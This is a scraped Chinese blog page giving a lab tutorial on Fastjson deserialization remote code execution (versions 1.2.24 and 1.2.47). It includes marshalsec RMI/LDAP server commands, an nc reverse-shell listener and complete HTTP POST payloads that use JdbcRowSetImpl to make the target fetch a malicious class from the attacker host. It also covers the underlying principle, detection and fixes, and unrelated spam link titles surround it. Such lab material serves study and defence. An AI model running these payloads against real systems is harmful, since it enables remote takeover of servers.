当前位置: 首页 > news >正文

网站推广员如何做免费网站入口网站免费进ps软件

网站推广员如何做,免费网站入口网站免费进ps软件,wordpress中文怎么设置中文乱码,thinkphp wordpress免责声明 本文仅限于学习讨论与技术知识的分享#xff0c;不得违反当地国家的法律法规。对于传播、利用文章中提供的信息而造成的任何直接或者间接的后果及损失#xff0c;均由使用者本人负责#xff0c;本文作者不为此承担任何责任#xff0c;一旦造成后果请自行承担… 免责声明 本文仅限于学习讨论与技术知识的分享不得违反当地国家的法律法规。对于传播、利用文章中提供的信息而造成的任何直接或者间接的后果及损失均由使用者本人负责本文作者不为此承担任何责任一旦造成后果请自行承担 1、Fastjson介绍 2、漏洞复现 2.1、1.2.24 RCE CVE-2017-18349 vulhub启动靶场 启动成功 Kali 用marshalsec启动LDAP/RMI服务 Kali 用python启动HTTP服务存放恶意类 这是我们的恶意代码 在jdk的bin目录下编译恶意文件 可以通过访问看有没有启动成功 Kali 用netcat监听端口建立反弹连接 java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://192.168.110.5:8089/#LinuxTouch 94735、发送payload POST / HTTP/1.1 Host: 192.168.110.16:8090 Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0 Accept:text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,*/*;q0.8 Accept-Language: zh-CN,zh;q0.8,zh-TW;q0.7,zh-HK;q0.5,en-US;q0.3,en;q0.2 Accept-Encoding: gzip, deflate Content-Type: application/json Content-Length: 188{ b: { type: com.sun.rowset.JdbcRowSetImpl, dataSourceName: rmi://192.168.110.5:9473/LinuxTouch, autoCommit: true} }结果 先后连接成功 8090端口接收到了我们发送的payload并进行反序列化然后去连接到了rmi://192.168.110.5:9473这个服务器rmi服务器作为一个指路人去8089端口下载恶意文件 2.2、1.2.47 RCE CNVD-2019-22238 绕过原理 在1.2.47版本及以下的情况下loadClass中默 认cache为true首先使用java.lang.Class把获取到的类缓存到mapping中然后直接从缓存 中获取到了com.sun.rowset.jdbcRowSetlmpl这个类即可绕过黑名单。 启动靶场 kali启动监听 nc -lvp 9001Kali 用marshalsec启动LDAP/RMI服务 java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://192.168.110.5:8089/#LinuxRevers 9473恶意类对其进行编译等等。跟上面步骤一样。 放入到对应文件夹中并启动http服务 发送payload POST / HTTP/1.1 Host: 192.168.110.16:8090 Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0 Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,*/*;q0.8 Accept-Language: zh-CN,zh;q0.8,zh-TW;q0.7,zh-HK;q0.5,en-US;q0.3,en;q0.2 Accept-Encoding: gzip, deflate Content-Type: application/json Content-Length: 268{a:{type:java.lang.Class, val:com.sun.rowset.JdbcRowSetImpl},b:{ type:com.sun.rowset.JdbcRowSetImpl, dataSourceName:ldap://192.168.110.5:9473/LinuxRevers, autoCommit:true} }连接成功 3、漏洞原理 1、序列化字符准备类名、dataSourceName属性和autoCommit属性 2、JdbcRowSetImpl反序列化调用JdbcRowSetImpl的setAutoCommit() 3、setAutoCommit()调用connect() 3、connect()调用lookup()连接到LDAP/RMI服务器 4、下载恶意代码到本地执行攻击发生 4、漏洞挖掘思路 找到发送JSON序列化数据的接口判断是否使用fastjon 非法格式报错 {“x”: Burp 插件 https://github.com/zilong3033/fastjsonScan 5、漏洞修复 升级JDK 6u211 / 7u201 / 8u191 /11.0.1升级Fastjson到最新版 fastjson.parser.safeModetrue使用安全产品过滤非法内容更换其它序列化工具 Jackson/Gson
http://www.hkea.cn/news/14432146/

相关文章:

  • 吴江区建设银行招聘网站爱站网综合查询
  • 做产品网站要备案吗精品一卡2卡三卡4卡分类
  • 学做网站好做吗网站降权不更新文章可以吗
  • 网站升级方案新手学seo
  • 免费免费网站模板下载网站备案做优惠券
  • 专门做招商的网站火车头采集直接发布到wordpress
  • 成都网站设计创新互联有什么网络项目可以做的
  • 东莞高埗做网站哪个公司好wordpress主题代码显示行
  • 提出网络营销思想的网站改版计划专业搭建网站
  • 长春建站宣传手淘网站建设需求分析
  • 中国六冶的网站谁做的怎么使用模板建设网站
  • 襄阳网站建设企业制作广告
  • 网站建设的市场需求app开发流程 网站开发
  • 鹿泉市建设局网站wordpress搬家 中文图片
  • 网站开发信息文档怎么进入网络管理系统
  • 中国建设建筑教育网站电商培训方案
  • 承德专业做网站的公司网页设计网站开发需要什么软件
  • 协会网站建设计划书阿里巴巴代加工平台
  • 怎么注册公司的网站网站建设与维护 许宝良 课件
  • 佛山网站建设与设计公司长沙推广网络营销公司
  • 焦作建设网站的公司网页源代码快捷键
  • 忻州市住房城乡建设局网站惠州网站开发
  • flex 做网站宝塔面安装wordpress
  • 在线呼叫网页版seo免费视频教程
  • 企业网站优化解决方案如何做电商网站 昆明
  • 南宁网站建设升上去网站分页设计
  • 网上国网app官方下载seo关键词是什么
  • 一个网站如何创建多个页面赤峰网站建设培训
  • 网站推广 方法石家庄有没有销售做被用的网站
  • 新网站建设平台西安做网站的云阔